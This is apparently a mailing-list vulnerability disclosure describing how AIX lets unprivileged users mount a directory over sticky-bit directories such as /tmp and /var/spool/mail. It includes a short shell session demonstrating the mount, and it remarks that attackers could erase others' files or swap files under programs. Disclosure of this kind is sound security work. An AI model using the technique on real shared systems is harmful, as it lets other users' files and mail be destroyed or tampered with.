Re: nfs_mount in AIX

[aleph1 () dfw net (Aleph One)]

Hi playing around with this I found another nasty thing.
Check this out:

$ id
uid=666666(www) gid=4294967294(nobody)
$ ls -ld /tmp
drwxrwxrwt   9 bin      bin         2560 Apr 26 09:36 /tmp
$ ls -ld /var/tmp/bah
drwxrwxrwx   2 www      nobody       512 Apr 26 09:31 /var/tmp/bah
$ mount /var/tmp/bah /tmp
$ ls -ld /tmp
drwxrwxrwx   2 www      nobody       512 Apr 26 09:31 /tmp
$ uname -a
AIX ibm1 2 3 000006693700
$

In other words AIX allows anyone to mount a directory onto a directory
of a file onto a file if the user has a) search permissions to the
directory or file to mount and b) write permissions to the directory
or file to mount over. Also in order the mount a block device, a remote
direcotry or a remote file the process must have root authority. As you
can see the stupid thing never checks the sticky bit in the directory
to mount over! This does not allows us to read the file created on our
mounted directory since they keep the uid.guid of the owner even after we
unmount them, but we can erase the files and maybe fuck around with
a few programs by switching files, etc.... This also includes /var/spool/mail
and any other directories with the sticky bit...

a1